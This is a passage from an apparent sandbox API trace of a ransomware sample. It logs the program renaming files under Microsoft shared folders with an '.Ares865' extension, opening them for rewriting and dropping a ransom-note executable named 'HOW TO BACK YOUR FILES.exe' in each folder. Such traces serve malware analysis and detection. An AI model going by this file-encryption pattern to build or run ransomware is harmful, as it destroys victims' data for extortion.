shared\\ink\\en-us\\micaut.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8704) returned 1 [0151.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.563] lstrcpyW (in: lpString1=0x2cce47e, lpString2="mip.exe.mui" | out: lpString1="mip.exe.mui") returned="mip.exe.mui" [0151.563] lstrlenW (lpString="mip.exe.mui") returned 11 [0151.563] lstrlenW (lpString="Ares865") returned 7 [0151.563] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0151.563] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.Ares865") returned 82 [0151.563] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.ares865"), dwFlags=0x1) returned 1 [0151.565] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.565] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10240) returned 1 [0151.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.568] lstrcpyW (in: lpString1=0x2cce47e, lpString2="mshwLatin.dll.mui" | out: lpString1="mshwLatin.dll.mui") returned="mshwLatin.dll.mui" [0151.568] lstrlenW (lpString="mshwLatin.dll.mui") returned 17 [0151.568] lstrlenW (lpString="Ares865") returned 7 [0151.568] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0151.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.Ares865") returned 88 [0151.569] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.ares865"), dwFlags=0x1) returned 1 [0151.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0151.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.575] lstrcpyW (in: lpString1=0x2cce47e, lpString2="rtscom.dll.mui" | out: lpString1="rtscom.dll.mui") returned="rtscom.dll.mui" [0151.575] lstrlenW (lpString="rtscom.dll.mui") returned 14 [0151.575] lstrlenW (lpString="Ares865") returned 7 [0151.575] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0151.575] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.Ares865") returned 85 [0151.575] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.ares865"), dwFlags=0x1) returned 1 [0151.577] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.577] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0151.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.580] lstrcpyW (in: lpString1=0x2cce47e, lpString2="TipBand.dll.mui" | out: lpString1="TipBand.dll.mui") returned="TipBand.dll.mui" [0151.580] lstrlenW (lpString="TipBand.dll.mui") returned 15 [0151.580] lstrlenW (lpString="Ares865") returned 7 [0151.580] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0151.580] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui.Ares865") returned 86 [0151.580] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.ares865"), dwFlags=0x1) returned 1 [0151.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.582] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3072) returned 1 [0151.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.586] lstrcpyW (in: lpString1=0x2cce47e, lpString2="TipRes.dll.mui" | out: lpString1="TipRes.dll.mui") returned="TipRes.dll.mui" [0151.586] lstrlenW (lpString="TipRes.dll.mui") returned 14 [0151.586] lstrlenW (lpString="Ares865") returned 7 [0151.586] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0151.586] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.Ares865") returned 85 [0151.586] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.ares865"), dwFlags=0x1) returned 1 [0151.587] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0151.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.592] lstrcpyW (in: lpString1=0x2cce47e, lpString2="TipTsf.dll.mui" | out: lpString1="TipTsf.dll.mui") returned="TipTsf.dll.mui" [0151.592] lstrlenW (lpString="TipTsf.dll.mui") returned 14 [0151.592] lstrlenW (lpString="Ares865") returned 7 [0151.592] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0151.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.Ares865") returned 85 [0151.593] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.ares865"), dwFlags=0x1) returned 1 [0151.594] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.594] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3072) returned 1 [0151.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.597] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7" [0151.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0151.597] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7") returned 60 [0151.597] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7" [0151.598] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.598] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.598] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.599] GetLastError () returned 0x0 [0151.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.599] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.599] CloseHandle (hObject=0x120) returned 1 [0151.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.599] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53793220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53793220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.599] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.599] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.599] lstrcpyW (in: lpString1=0x2cce47a, lpString2="Microsoft.Ink.dll" | out: lpString1="Microsoft.Ink.dll") returned="Microsoft.Ink.dll" [0151.599] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0151.600] lstrlenW (lpString="Ares865") returned 7 [0151.600] lstrcmpiW (lpString1="Ink.dll", lpString2="Ares865") returned 1 [0151.600] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll.Ares865") returned 86 [0151.600] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\microsoft.ink.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\microsoft.ink.dll.ares865"), dwFlags=0x1) returned 1 [0151.601] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\microsoft.ink.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.601] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=516096) returned 1 [0151.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0151.632] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0" [0151.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0151.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0151.632] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0") returned 60 [0151.632] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0" [0151.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.634] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.634] GetLastError () returned 0x0 [0151.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.634] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.634] CloseHandle (hObject=0x120) returned 1 [0151.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.635] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x537b9380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537b9380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.635] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.635] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.635] lstrcpyW (in: lpString1=0x2cce47a, lpString2="Microsoft.Ink.dll" | out: lpString1="Microsoft.Ink.dll") returned="Microsoft.Ink.dll" [0151.635] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0151.635] lstrlenW (lpString="Ares865") returned 7 [0151.635] lstrcmpiW (lpString1="Ink.dll", lpString2="Ares865") returned 1 [0151.635] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll.Ares865") returned 86 [0151.635] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\microsoft.ink.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\microsoft.ink.dll.ares865"), dwFlags=0x1) returned 1 [0151.637] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\microsoft.ink.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.637] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=356352) returned 1 [0151.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0151.660] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help" [0151.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0151.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7948 | out: hHeap=0x2b0000) returned 1 [0151.660] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help") returned 57 [0151.660] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help" [0151.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.662] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.662] GetLastError () returned 0x0 [0151.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.662] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.662] CloseHandle (hObject=0x120) returned 1 [0151.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.662] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537b9380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537b9380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.663] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.663] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.663] lstrcpyW (in: lpString1=0x2cce474, lpString2="1028" | out: lpString1="1028") returned="1028" [0151.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0151.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f00d8 [0151.663] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0151.663] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53877a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53877a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0151.663] lstrcmpiW (lpString1="1031", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.663] lstrcmpiW (lpString1="1031", lpString2="aoldtz.exe") returned -1 [0151.663] lstrcpyW (in: lpString1=0x2cce474, lpString2="1031" | out: lpString1="1031") returned="1031" [0151.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0151.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0518 [0151.664] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0151.664] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53877a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53877a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0151.664] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.664] lstrcmpiW (lpString1="1033", lpString2="aoldtz.exe") returned 